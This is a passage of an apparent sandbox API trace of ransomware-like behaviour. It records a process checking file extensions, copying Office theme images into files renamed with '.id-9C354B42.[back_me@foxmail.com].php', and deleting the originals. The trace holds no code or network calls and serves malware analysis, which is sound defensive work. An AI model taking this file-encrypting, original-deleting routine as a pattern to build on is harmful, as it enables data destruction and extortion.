Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png")) returned 1 [0046.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0046.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0046.628] lstrlenW (lpString=".doc") returned 4 [0046.628] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.628] lstrlenW (lpString=".docx") returned 5 [0046.628] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.628] lstrlenW (lpString=".pdf") returned 4 [0046.628] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.628] lstrlenW (lpString=".xls") returned 4 [0046.628] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.628] lstrlenW (lpString=".xlsx") returned 5 [0046.628] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.628] lstrlenW (lpString=".ppt") returned 4 [0046.628] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0046.628] lstrlenW (lpString=".zip") returned 4 [0046.628] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.628] lstrlenW (lpString=".rar") returned 4 [0046.628] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.628] lstrlenW (lpString=".bz2") returned 4 [0046.628] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.628] lstrlenW (lpString=".7z") returned 3 [0046.628] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0046.628] lstrlenW (lpString=".dbf") returned 4 [0046.628] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0046.628] lstrlenW (lpString=".1cd") returned 4 [0046.629] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0046.629] lstrlenW (lpString=".jpg") returned 4 [0046.629] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0046.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0046.629] lstrlenW (lpString=".doc") returned 4 [0046.629] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.629] lstrlenW (lpString=".docx") returned 5 [0046.629] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.629] lstrlenW (lpString=".pdf") returned 4 [0046.629] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.629] lstrlenW (lpString=".xls") returned 4 [0046.629] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.629] lstrlenW (lpString=".xlsx") returned 5 [0046.629] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.629] lstrlenW (lpString=".ppt") returned 4 [0046.629] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0046.629] lstrlenW (lpString=".zip") returned 4 [0046.629] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.629] lstrlenW (lpString=".rar") returned 4 [0046.629] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.629] lstrlenW (lpString=".bz2") returned 4 [0046.629] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.629] lstrlenW (lpString=".7z") returned 3 [0046.629] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0046.629] lstrlenW (lpString=".dbf") returned 4 [0046.629] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0046.629] lstrlenW (lpString=".1cd") returned 4 [0046.629] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0046.630] lstrlenW (lpString=".jpg") returned 4 [0046.630] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.630] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0046.630] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.630] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.631] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=2044) returned 1 [0046.631] CloseHandle (hObject=0x194) returned 1 [0046.632] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif")) returned 0x20 [0046.632] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.632] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.632] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.632] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.632] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0046.634] GetLastError () returned 0x0 [0046.634] ReadFile (in: hFile=0x194, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x7fc, lpOverlapped=0x0) returned 1 [0046.635] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x800, lpOverlapped=0x0) returned 1 [0046.636] ReadFile (in: hFile=0x194, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.636] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.636] SetEndOfFile (hFile=0x1b4) returned 1 [0046.636] CloseHandle (hObject=0x1b4) returned 1 [0046.636] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.636] SetEndOfFile (hFile=0x194) returned 1 [0046.637] CloseHandle (hObject=0x194) returned 1 [0046.637] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.637] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif")) returned 1 [0046.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0046.638] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0046.638] lstrlenW (lpString=".doc") returned 4 [0046.638] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.638] lstrlenW (lpString=".docx") returned 5 [0046.638] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.638] lstrlenW (lpString=".pdf") returned 4 [0046.638] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.638] lstrlenW (lpString=".xls") returned 4 [0046.638] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.638] lstrlenW (lpString=".xlsx") returned 5 [0046.638] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.638] lstrlenW (lpString=".ppt") returned 4 [0046.638] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.638] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0046.638] lstrlenW (lpString=".zip") returned 4 [0046.638] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.638] lstrlenW (lpString=".rar") returned 4 [0046.638] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.638] lstrlenW (lpString=".bz2") returned 4 [0046.638] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.638] lstrlenW (lpString=".7z") returned 3 [0046.638] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.638] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0046.638] lstrlenW (lpString=".dbf") returned 4 [0046.638] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.638] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0046.638] lstrlenW (lpString=".1cd") returned 4 [0046.638] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.638] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0046.638] lstrlenW (lpString=".jpg") returned 4 [0046.638] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.638] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0046.638] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0046.639] lstrlenW (lpString=".doc") returned 4 [0046.639] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.639] lstrlenW (lpString=".docx") returned 5 [0046.639] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.639] lstrlenW (lpString=".pdf") returned 4 [0046.639] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.639] lstrlenW (lpString=".xls") returned 4 [0046.639] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.639] lstrlenW (lpString=".xlsx") returned 5 [0046.639] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.639] lstrlenW (lpString=".ppt") returned 4 [0046.639] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.639] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0046.639] lstrlenW (lpString=".zip") returned 4 [0046.639] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.639] lstrlenW (lpString=".rar") returned 4 [0046.639] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.639] lstrlenW (lpString=".bz2") returned 4 [0046.639] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.639] lstrlenW (lpString=".7z") returned 3 [0046.639] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.639] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0046.639] lstrlenW (lpString=".dbf") returned 4 [0046.639] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.639] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0046.639] lstrlenW (lpString=".1cd") returned 4 [0046.639] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.639] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0046.639] lstrlenW (lpString=".jpg") returned 4 [0046.639] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.639] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0046.640] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.640] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.640] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=29925) returned 1 [0046.640] CloseHandle (hObject=0x194) returned 1 [0046.640] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png")) returned 0x20 [0046.640] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.640] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.640] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.640] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.640] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0046.641] GetLastError () returned 0x0 [0046.641] ReadFile (in: hFile=0x194, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x74e5, lpOverlapped=0x0) returned 1 [0046.642] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x74f0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x74f0, lpOverlapped=0x0) returned 1 [0046.644] ReadFile (in: hFile=0x194, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.644] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.644] SetEndOfFile (hFile=0x1b4) returned 1 [0046.644] CloseHandle (hObject=0x1b4) returned 1 [0046.644] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.644] SetEndOfFile (hFile=0x194) returned 1 [0046.648] CloseHandle (hObject=0x194) returned 1 [0046.648] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.648] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png")) returned 1 [0046.648] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0046.648] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0046.648] lstrlenW (lpString=".doc") returned 4 [0046.648] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.648] lstrlenW (lpString=".docx") returned 5 [0046.648] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.648] lstrlenW (lpString=".pdf") returned 4 [0046.648] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.648] lstrlenW (lpString=".xls") returned 4 [0046.648] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.648] lstrlenW (lpString=".xlsx") returned 5 [0046.648] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.648] lstrlenW (lpString=".ppt") returned 4 [0046.648] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.648] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0046.648] lstrlenW (lpString=".zip") returned 4 [0046.648] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.649] lstrlenW (lpString=".rar") returned 4 [0046.649] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.649] lstrlenW (lpString=".bz2") returned 4 [0046.649] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.649] lstrlenW (lpString=".7z") returned 3 [0046.649] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.649] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0046.649] lstrlenW (lpString=".dbf") returned 4 [0046.649] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.649] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0046.649] lstrlenW (lpString=".1cd") returned 4 [0046.649] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.649] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0046.649] lstrlenW (lpString=".jpg") returned 4 [0046.649] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.649] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0046.649] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0046.649] lstrlenW (lpString=".doc") returned 4 [0046.649] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.649] lstrlenW (lpString=".docx") returned 5 [0046.649] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.649] lstrlenW (lpString=".pdf") returned 4 [0046.649] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.649] lstrlenW (lpString=".xls") returned 4 [0046.649] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.649] lstrlenW (lpString=".xlsx") returned 5 [0046.649] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.649] lstrlenW (lpString=".ppt") returned 4 [0046.649] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.649] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0046.649] lstrlenW (lpString=".zip") returned 4 [0046.649] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.649] lstrlenW (lpString=".rar") returned 4 [0046.649] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.650] lstrlenW (lpString=".bz2") returned 4 [0046.650] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.650] lstrlenW (lpString=".7z") returned 3 [0046.650] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.650] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0046.650] lstrlenW (lpString=".dbf") returned 4 [0046.650] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.650] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0046.650] lstrlenW (lpString=".1cd") returned 4 [0046.650] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.650] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0046.650] lstrlenW (lpString=".jpg") returned 4 [0046.650] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.650] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0046.650] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.650] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.650] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1363) returned 1 [0046.650] CloseHandle (hObject=0x194) returned 1 [0046.651] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif")) returned 0x20 [0046.651] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.651] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.651] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.651] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.651] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.914] GetLastError () returned 0x0 [0046.914] ReadFile (in: hFile=0x194, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x553, lpOverlapped=0x0) returned 1 [0046.916] WriteFile (in: hFile=0x198, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x560, lpOverlapped=0x0) returned 1 [0046.916] ReadFile (in: hFile=0x194, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.917] WriteFile (in: hFile=0x198, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.917] SetEndOfFile (hFile=0x198) returned 1 [0046.917] CloseHandle (hObject=0x198) returned 1 [0046.917] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.917] SetEndOfFile (hFile=0x194) returned 1 [0046.918] CloseHandle (hObject=0x194) returned 1 [0046.918] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.918] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft 